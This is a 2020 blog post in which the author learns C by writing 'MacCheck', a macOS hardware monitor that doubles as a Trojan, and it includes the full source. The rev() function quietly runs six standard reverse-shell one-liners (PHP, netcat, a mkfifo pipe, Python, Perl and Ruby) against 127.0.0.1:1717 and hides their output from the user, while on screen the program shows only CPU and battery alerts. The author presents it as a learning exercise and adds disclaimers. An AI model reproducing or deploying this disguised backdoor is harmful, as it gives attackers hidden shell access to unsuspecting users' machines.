---
title: "A reverse shell disguised as a hardware monitor (C)"
date: 2020-05-18
tags: [programming, c]
header:
  image: "/images/banner2.png"
  excerpt: "Programming, C"
---

This program was inspired by the saying I sometimes hear that "Macs don't get viruses". I wanted to find out what it's like to write malware, which factors you have to consider, what way of thinking is required. I think that doing so and temporarily roleplaying as an attacker puts you in a better position to defend against threats.

I also wanted to learn a programming language that isn't also a shell language. I did some research and ended up picking C. I had a lot of reasons for this, but what stood out to me were 2 things:

* the amount of malware and exploits written in C
* the amount of IoT (Internet of Things) written in C

To me, this was killing two giant birds with one stone. That stone ended up being a lot bigger and heavier than I anticipated, but still. My goal was to write a program that resembles a Trojan - in this case, one that monitors a Mac's battery temperature and CPU usage while attempting to grant backdoor access to another machine.

Note: I won't (and you shouldn't) use this program as an actual Trojan or as malware in general (such as using this program to gain access to a machine whos owner hasn't explicitly given permission to do so). I've written this program (and this post) to learn and to talk about what that learning has been like for me, *nothing else*. You shouldn't let anyone run this program if that person doesn't fully understand what it does and hasn't given explicit permission for access through a reverse shell.

## The main() function

I start off by making sure the program is executed the right way: being run in the background. If it's not, it prints usage instructions. I check this in the same way I did in my [network monitor written in Bash](https://holstrater.github.io/dlp.sh/), which may also be suboptimal in C. Since checking if the current program is being run in the background seems like a valuable thing to master in general, I'll look for improvements regarding this later on. I then print a brief introduction to the user, noting that the Terminal application should not be completely closed to keep the program from exiting, although hiding it is fine.

The program then calls three different functions and waits for 35 seconds. After that, the three functions are called again, waiting for 35 seconds again, infinitely repeating this in a loop.

## The check_cpu() function

The first function that is called and executed, monitors and reports about current CPU usage of the user's machine. It does this by issuing a command that checks kernel stats, in this case `vm.loadavg`. It does some filtering on these stats, making sure to only store the relevant part in the `.txt` file.

After that, some variables are initialized, making sure that the contents of the `.txt` file can be stored in an actual variable. After converting the variable content to the `int` type, the content is evaluated in a few `if` statements. This way, if the current CPU usage (stored in the variable) matches certain criteria, a temporary alert pops up informing the user of what's going on. Since high CPU usage is generally fine (especially on modern CPUs), I decided to keep the criteria rather strict. Doing otherwise could ruin the user experience if the alerts are interpreted as false positives. This could lead to the user shutting down the program entirely.

Since there's a considerable `sleep` being executed in the main loop, I didn't want the `.txt` to just sit there and do nothing for such a long time so I delete it each time `check_cpu()` ends.

## The check_bat() function

The second function does the same thing as the previous function, but instead of CPU usage it monitors and reports about current battery temperature of the user's machine. Instead of `sysctl` it uses `ioreg` which is able to query the required information. I did some research on the way the specific type of battery in Macs reacts to heat, on which I then based my criteria in the `if` statements.

Note: the numbers in these `if` statements are Celsius multiplied by 100 because that's how they're measured by `ioreg`, but this multiplication is obviously accounted for in the alerts shown to the user.

## The rev() function

The third function is the part where the program attempts to establish a connection with a remote computer, giving that computer shell access. It does this by attempting method A first and if method A fails, it waits for 5 seconds and attempts method B. It turned out that a lower `sleep` duration disrupts the methods that follow each failed attempt, so I ended up with 5 seconds each. The methods consist of generally well-known 'oneliners', each relying on a different language or command. These open up a network socket connecting to the IP that was provided on the port that was provided.

To simulate how a trojan *would* work, I made some minor changes to these commands so that, if they fail (or even succeed) to set up a reverse shell, it doesn't show to the user. From a user point of view, apart from CPU usage and battery temperature being monitored nothing is happening.

## Final words

I learned a lot about the C language creating this program, but not completely the way I intended. C, for me, isn't the kind of language that you can pick up easily just by *doing*. Since it's such a low-level language with in my opinion not very intuitive syntax, it benefits a lot from creating a steady foundation with several books. Otherwise, you might end up with crucial gaps in your knowledge that will pretty much follow you forever. The proof of this in this particular program is the combination of C and shell commands rather than the program being almost pure C.

Nevertheless, I did end up with a program that I think is very interesting, particularly in its combination of "good" (monitoring hardware stats) and "bad" (setting up backdoor access).

Also: I've been working on my socket programming and multithreading skills/knowledge while writing `maccheck.c`, so keep an eye out for a C program related to that in the future. In the meantime though, I have some reading to do. If you have any suggestions, questions or comments in general, please let me know. They're more than welcome.

```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

void check_cpu(void);
void check_bat(void);
void rev(void);

/*
NOTE: I won't (and you shouldn't) use this program as an actual Trojan or as
malware in general (such as using this program to gain access to a machine whos
owner hasn't explicitly given permission to do so). I've written this program
(and the blog post that explains it) to learn and to talk about what that
learning has been like for me, *nothing else*. You shouldn't let anyone run
this program if that person doesn't fully understand what it does and hasn't
given explicit permission for access through a reverse shell.
*/

int main(int argc, char *argv[]) {

	if (argc != 2 || strcmp(argv[1], "&")) {
		printf("\nMacCheck was not executed properly. \nPlease execute by entering the following: ./maccheck \"&\"&\n\n");
		exit(0);
	}

	printf("\nWelcome to MacCheck, a lightweight tool for MacOS that monitors CPU usage and battery temperature.\n\n");
	printf("Once temperature and usage exceeds a certain level, a temporary and non-intrusive notification will appear to inform you.\n\n");
  printf("Monitoring will remain active in the background but relies on the Terminal app. Minimizing it or executing other commands is OK, but please do not close the Terminal app.\n\n");

	while (1) {
		check_cpu();
		check_bat();
		rev();
		sleep(35);
	}

	return 0;
}

void check_cpu(void) {

	system("sysctl -n vm.loadavg | awk -F' ' '{print $2 > \"maccheck_tmp1.txt\"}'");

	char cpu_s[50];
	int cpu_i;
	FILE *fp;
	fp = fopen("maccheck_tmp1.txt", "r+");

	fgets(cpu_s, sizeof(cpu_s), fp);

	cpu_i = atoi(cpu_s);

	if (cpu_i >= 90 && cpu_i <= 95) {
	system("osascript -e 'display notification \"CPU usage is between 90% and 95%!\" with title \"MacCheck\"'");
	}
	else if (cpu_i >= 95 && cpu_i <= 100) {
	system("osascript -e 'display notification \"CPU usage is between 95% and 100%!\" with title \"MacCheck\"'");
	}
	else if (cpu_i > 100) {
	system("osascript -e 'display notification \"WARNING: CPU usage is over 100%!\" with title \"MacCheck\"'");
	}

	fclose(fp);
	system("rm maccheck_tmp1.txt");

}

void check_bat(void) {

	system("ioreg -brc AppleSmartBattery | grep Temperature | awk -F' ' '{print $3 > \"maccheck_tmp2.txt\"}'");

	char bat_s[50];
	int bat_i;
	FILE *fp2;
	fp2 = fopen("maccheck_tmp2.txt", "r+");

	fgets(bat_s, sizeof(bat_s), fp2);

	bat_i = atoi(bat_s);

	if (bat_i >= 4000 && bat_i <= 4500) {
	system("osascript -e 'display notification \"Battery temperature is between 40°C and 45°C!\" with title \"MacCheck\"'");
	}
	else if (bat_i >= 4500 && bat_i <= 5000) {
	system("osascript -e 'display notification \"Battery temperature is between 45°C and 50°C!\" with title \"MacCheck\"'");
	}
	else if (bat_i > 5000) {
	system("osascript -e 'display notification \"WARNING: Battery temperature is over 50°C!\" with title \"MacCheck\"'");
	}

	fclose(fp2);
	system("rm maccheck_tmp2.txt");

}

void rev(void) {

	if (system("php -r '$sock=fsockopen(\"127.0.0.1\",1717);exec(\"/bin/sh -i <&3 >&3 2>&3\");' > /dev/null 2>&1 &") != 1) {
		sleep(5);
		if (system("nc -e /bin/sh 127.0.0.1 1717 > /dev/null 2>&1 &") != 1) {
			sleep(5);
      if (system("rm /tmp/f > /dev/null 2>&1;mkfifo /tmp/f > /dev/null 2>&1;cat /tmp/f|/bin/sh -i 2>&1|nc 127.0.0.1 1717 >/tmp/f > /dev/null 2>&1 &") != 1) {
        	sleep(5);
	        if (system("python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"127.0.0.1\",1717));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);\' > /dev/null 2>&1 &") != 1) {
	          	sleep(5);
	            if (system("perl -e 'use Socket;$i=\"127.0.0.1\";$p=1717;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};' > /dev/null 2>&1 &") != 1) {
	              	sleep(5);
									system("ruby -rsocket -e'f=TCPSocket.open(\"127.0.0.1\",1717).to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)' > /dev/null 2>&1 &");
							}
					}
			}
	  }
	}
}
```
